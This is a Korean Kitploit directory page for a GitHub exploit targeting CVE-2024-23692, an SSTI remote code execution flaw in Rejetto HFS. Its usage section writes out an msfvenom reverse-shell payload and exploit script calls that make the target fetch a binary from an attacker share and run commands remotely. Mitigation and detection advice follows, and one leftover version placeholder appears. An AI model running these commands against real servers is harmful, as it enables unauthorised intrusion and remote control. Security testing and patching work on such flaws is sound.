Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/mr-r00t11/cve-2024-23692
Payload GenerationVulnerability AnalysisExploitationShellcodeWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubmr-r00t11/cve-2024-23692

CVE-2024-23692

Rejetto HFS (HTTP File Server)는 간단한 웹 파일 서버로, 네트워크나 인터넷을 통한 파일 공유를 용이하게 합니다.

저장소 보기
22년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Rejetto HFS (HTTP File Server) CVE-2024-23692 취약점


개요

Rejetto HFS (HTTP File Server)는 네트워크나 인터넷을 통해 파일 공유를 용이하게 하는 간단한 웹 파일 서버입니다. 사용 편의성과 단순성에도 불구하고, 심각한 취약점(CVE-2024-23692)이 발견되어 서버가 공격자들의 표적이 되고 있습니다.


CVE-2024-23692: 서버 사이드 템플릿 인젝션 (SSTI) 취약점


설명

CVE-2024-23692는 Rejetto HFS에서 확인된 서버 사이드 템플릿 인젝션(SSTI) 취약점입니다. 이 취약점은 공격자가 서버에 악성 템플릿을 주입하고 실행할 수 있게 합니다. 악용될 경우 원격 코드 실행으로 이어져 전체 서버와 호스팅된 데이터를 손상시킬 수 있습니다.


영향

이 취약점을 악용하는 공격자는 다음을 수행할 수 있습니다:

  • 서버에서 임의 코드 실행
  • 민감한 데이터에 대한 무단 접근 획득
  • 서버의 무결성 및 가용성 손상
  • 손상된 서버를 사용하여 네트워크 내에서 추가 공격 실행

사용법

msfvenom으로 생성된 악성 바이너리를 사용하여 셸을 획득합니다.

참고: nc 리스닝 상태를 유지하세요.

root@kitploit:~
# $ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.198.128 LPORT=1234 -f exe > exploit.exe

$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 //192.168.198.128/kali/exploit.exe

[Screenshot_1.png]

명령을 원격으로 실행합니다.

root@kitploit:~
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 systeminfo

결과가 표시되는 데 약 15초가 소요될 수 있습니다.

[Screenshot_2.png]


영향을 받는 버전

[insert latest vulnerable version here] 버전을 포함한 모든 Rejetto HFS 버전이 이 취약점의 영향을 받습니다.


완화 방안

CVE-2024-23692가 제기하는 위험을 완화하기 위해 사용자는 다음을 권장합니다:

  • 최신 버전으로 업데이트: 이 취약점이 패치된 Rejetto HFS 버전을 사용하고 있는지 확인하세요. 공식 Rejetto HFS 웹사이트 또는 저장소에서 최신 업데이트를 확인하십시오.
  • 보안 모범 사례 적용: HFS 서버에 대한 접근을 신뢰할 수 있는 네트워크와 사용자로만 제한하세요. 강력한 인증 및 권한 부여 메커니즘을 사용하십시오.
  • 모니터링 및 감사: 서버에서 비정상적인 활동이 있는지 정기적으로 모니터링하고 악용 징후가 있는지 로그를 감사하세요.

탐지

서버가 손상되었는지 확인하려면 다음을 살펴보세요:

  • 서버에서 발생하는 비정상적인 네트워크 트래픽
  • 서버의 예상치 못한 파일 또는 프로세스
  • 서버 구성 또는 데이터에 대한 무단 변경

신고 및 지원

추가 지원이 필요하면 Rejetto HFS 커뮤니티 포럼이나 공식 지원 채널을 참조하세요.


리소스

  • Rejetto HFS 공식 웹사이트
  • CVE-2024-23692 상세 정보

라이선스

이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하세요.


도구 다운로드